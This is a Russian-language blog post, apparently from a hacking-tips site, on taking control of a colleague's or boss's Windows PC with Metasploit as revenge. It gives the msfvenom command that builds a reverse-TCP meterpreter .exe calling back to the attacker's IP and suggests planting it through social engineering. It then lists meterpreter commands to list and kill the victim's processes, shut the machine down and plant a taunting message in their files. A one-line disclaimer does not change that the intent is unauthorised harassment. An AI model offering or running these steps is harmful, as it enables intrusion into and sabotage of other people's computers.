Мысли по рынку криптовалют
Мысли по рынку криптовалют на 05.09.2019
Сентябрь 5, 2019
Как пользоваться Metasploit
Как пользоваться Metasploit
Сентябрь 5, 2019
Показать все
Как управлять чужим компьютером

Всем привет дорогие читатели, решил запилить гайд по управлению чужим компьютером, иными словами, будем управлять зараженным ПК.

Бывает на работе вас достает начальник или коллега, вы понимаете о чем я. Вот и пришло время показать такому человеку кто в доме батя, если конечно ваш обидчик не особо понимает в информационной безопасности. Но в любом случае мы можем скрыть наш вирус. Я покажу на примере Metasploit. Мы создадим файл с полезной нагрузкой (payload) под Windows.

Суть данного материала, помочь новичкам с нуля, разобраться, что же делать после заражения компьютера жертвы.

Автор и создатели данного сайта не несут никакой ответственности за использование ресурсов доступных в этой статье.

Вся информация дана исключительно в информационных целях.

Первое, что нужно сделать, это зайти в терминал Kali Linux и прописать такой код:

msfvenom -p windows/meterpreter/reverse_tcp
LHOST=Ваш IP LPORT=4444 -f exe -o название.exe

-p windows/meterpreter/reverse_tcp — это наша полезная нагрузка
lport=4444 — порт для обратного соединения
-f exe — в каком формате будет наша нагрузка
-o название.exe — сохраняет код с названием по адресу который мы указали

-p это обязательная часть кода. Для того бы узнать целевой IP адрес пишем ifconfig. Для выведения полезных нагрузок вводим следующее:

msfvenom -l payloads

В следующем шаге, вы будете лицезреть список, что с нимделать, думаю поймете. Теперь после того как наш вирус готов, эго только осталось загрузить на ПК недруга. Сделать это можно разными методами, в частности используя СИ, но я не буде на этом акцентировать внимание. Наша основная цель, управление компом жертвы.

Решающий момент. Открываете сессию Meterpreter и можете спокойно работать с устройством. Что мы можем сделать? Например проверить какие процессы запущенны. Для этого вводим: ps

Нам отобразятся все запущенные процессы на компьютере жертвы. Скажем, что на ПК работает, к примеру Microsoft World. Чего же мы ждем, вырубаем его командой: kill 1600

Число 1600 означает идентификатор программы которая запущена в данный момент. Вы сможете их посмотреть при предыдущем запросе. Вам этого мало? Так давайте же вырубим ему и комп: shutdown

В таком случае может закрасться  подозрение на счет ПК, как будто он не исправен или попросту глючит. Такой исход может немного пощекотать нервы обидчика. К примеру, на машине жертвы вы обнаружили какой-нибудь текстовый файл. Мы легко можем отредактировать его через vim. Пишем: edit namefile.txt

namefile является примером названия любого документа, который находится на целевом устройстве. Командой выше мы его открываем. И можем написать там что угодно:

Я тебя взломал, ваша Виндовс будет стёрта! ХА-ХА-ХА

Ну или что-то в этом духе, все зависит от вашей смекалки. Правда… имеются баги, нужно перенести документ на рабочий стол. Запускаем консоль: shell
и вставляем этот код: notepad namefile.txt

В принцепи все довольно просто и одновременно весело, для вас конечно.
Данная статья написанна для начинающего хакера, дабы немного расширить кругозор границ полезной информацией.
Metasploit способен на много больше, это всего лишь малая верхушка айсберга 😉

0

Автор публикации

не в сети 5 дней

Александр Никитюк

14
Комментарии: 11Публикации: 151Регистрация: 17-05-2019
ПОДЕЛИСЬ С ДРУЗЬЯМИ

1 Комментарий

  1. Bob Gray:

    Весьма познавательный гайд, а то для меня метасплоит, темный лес.

    0

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

3 × пять =

Авторизация
*
*

8 + 9 =

Регистрация
*
*
*
Пароль не введен
*

16 + четыре =

Генерация пароля

девятнадцать − 7 =